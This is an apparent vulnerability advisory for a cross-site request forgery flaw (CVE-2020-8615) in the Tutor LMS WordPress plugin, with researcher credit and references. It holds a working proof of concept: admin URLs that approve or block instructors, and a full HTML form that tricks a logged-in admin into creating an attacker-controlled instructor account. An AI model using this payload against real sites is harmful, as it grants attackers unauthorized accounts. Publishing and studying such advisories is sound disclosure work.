Tutor LMS < 1.5.3 - Cross-Site Request Forgery (CSRF)



Description
Tutor LMS WordPress plugin is vulnerable to Cross-Site Request Forgery (CSRF) attacks.
Proof of Concept
As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF attack to approve an attacker-controlled instructor account can be performed by having the admin visit https://example.com/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, after retrieving the instructor ID during the registration process.

An approved instructor can also be blocked by directing the admin to visit https://example/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

CSRF attack can also be performed on the form present at https://example/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval. This can be done by tricking the admin to submit the below-given web form as a POST request. For example, if the web form is hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://example can be tricked into visiting the link and triggering the request to add an instructor.

<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="https://example/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="add&#95;new&#95;instructor" />
			<input type="hidden" name="first&#95;name" value="John" />
			<input type="hidden" name="last&#95;name" value="Doe" />
			<input type="hidden" name="user&#95;login" value="jd_instructor" />
			<input type="hidden" name="email" value="jd@domain.com" />
			<input type="hidden" name="phone&#95;number" value="1231231231" />
			<input type="hidden" name="password" value="Pa&#36;&#36;w0rd&#33;" /> 
			<input type="hidden" name="password&#95;confirmation" value="Pa&#36;&#36;w0rd&#33;" />
			<input type="hidden" name="tutor&#95;profile&#95;bio" value="Et&#32;tempore&#32;culpa&#32;n" />
			<input type="hidden" name="action" value="tutor&#95;add&#95;instructor" /> 
			<input type="submit" value="Submit request" />
		</form> 
	</body>
</html>

Affects Plugin

References

CVE 2020-8615
URL https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
URL https://www.jinsonvarghese.com/cross-site-request-forgery-in-tutor-lms/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Jinson Varghese Behanan
Submitter Jinson Varghese Behanan
Submitter Website https://www.getastra.com/
Submitter Twitter JinsonCyberSec
Views 4436
Verified No
WPVDB ID 10058

Timeline

Publicly Published 2020-02-04 (about 2 months ago)
Added 2020-02-04 (about 2 months ago)
Last Updated 2020-03-02 (30 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin